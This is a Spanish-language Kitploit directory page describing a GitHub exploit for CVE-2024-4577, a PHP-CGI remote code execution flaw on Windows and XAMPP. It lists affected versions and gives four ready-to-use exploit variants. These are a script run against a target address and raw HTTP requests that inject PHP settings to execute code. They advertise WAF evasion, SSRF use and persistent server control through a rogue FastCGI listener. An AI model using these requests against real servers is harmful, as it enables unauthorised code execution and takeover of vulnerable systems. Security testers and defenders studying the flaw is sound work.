Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4577-PHP-RCE — Exploit para CVE-2024-4577 PHP-CGI RCE en Windows, con omisión de WAF y soporte SSRF. Proporciona múltiples variantes de exploit para escenarios predeterminados, WAF y SSRF. | Kitploit
Herramientas/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de Penetración
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

Exploit para CVE-2024-4577 PHP-CGI RCE en Windows, con omisión de WAF y soporte SSRF. Proporciona múltiples variantes de exploit para escenarios predeterminados, WAF y SSRF.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
5hace 2 añosAún no revisado
Compartir

CVE-2024-4577-PHP-RCE

Resumen y Principio del Proyecto

  • El primer exploit del mundo para la vulnerabilidad CVE-2024-4577 PHP-CGI RCE que utiliza el entorno PHP predeterminado (XAMPP).
  • El primer exploit del mundo CVE-2024-4577 PHP-CGI RCE que utiliza el entorno PHP predeterminado. Comparte el exploit original, admite SSRF, admite bypass de WAF.
  • Logra RCE en el entorno PHP predeterminado. Principio: cgi.force_redirect + REDIRECT-STATUS.
  • Nuevo exploit original que admite bypass de WAF. Principio: establecer un servidor FastCGI + comunicación mediante protocolo FastCGI.
  • Nuevo exploit original que admite el escenario SSRF. Principio: protocolo data:// + solicitud GET.

Ventajas de EXP 1

  • No necesita allow_url_include, auto_prepend_file, auto_append_file para lograr RCE. Puede incluir cualquier archivo y archivo PHP.
  • No aparecen las palabras clave que WAF intercepta con frecuencia: allow_url_include, auto_prepend_file, auto_append_file.
  • Todas las comunicaciones del servidor FastCGI no serán registradas por el WAF.
  • Escucha en un nuevo puerto, logrando así un control persistente del servidor PHP, independiente de Apache y PHP.
  • Resumen de la Vulnerabilidad

    InformaciónContenido
    Nombre de la vulnerabilidadPHP RCE
    ID de vulnerabilidadCVE-2024-4577
    Nivel de riesgoAlto
    Tipo de vulnerabilidadRCE
    Dificultad de explotaciónBajo

    Versiones Afectadas

    • PHP (versión Windows) 8.3.0 <= versión < 8.3.8
    • PHP (versión Windows) 8.2.0 <= versión < 8.2.20
    • PHP (versión Windows) 8.1.0 <= versión < 8.1.29
    • PHP (versión Windows) versión == 8.0.x
    • PHP (versión Windows) versión == 7.x
    • PHP (versión Windows) versión == 5.x
    • XAMPP (versión Windows) 8.2.0 <= versión <= 8.2.12
    • XAMPP (versión Windows) 8.1.0 <= versión <= 8.1.25
    • XAMPP (versión Windows) versión == 8.0.x
    • XAMPP (versión Windows) versión == 7.x
    • XAMPP (versión Windows) versión == 5.x

    EXP 1

    Se puede utilizar en escenarios de bypass de WAF + escenario predeterminado:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    Por ejemplo:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    Se puede utilizar en escenarios SSRF + escenario predeterminado:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    Se puede utilizar en escenario predeterminado:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    Se puede utilizar en escenario predeterminado:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    Reproducción

    1. Entorno del servidor:
    root@kitploit:~
    XAMPP Windows versión 8.2.12
    
    1. Descargar e instalar XAMPP en el servidor:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    O elija una versión afectada desde: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    1. Configuración del servidor
    root@kitploit:~
    No requiere ninguna modificación, mantener la configuración predeterminada
    
    1. Usar el exploit en el cliente
    root@kitploit:~
    Probar con los exploits anteriores
    
    1. Verificación
    root@kitploit:~
    Observar si se devuelve la cadena "TesT" o el contenido del archivo system.ini del servidor
    
    Descargar herramienta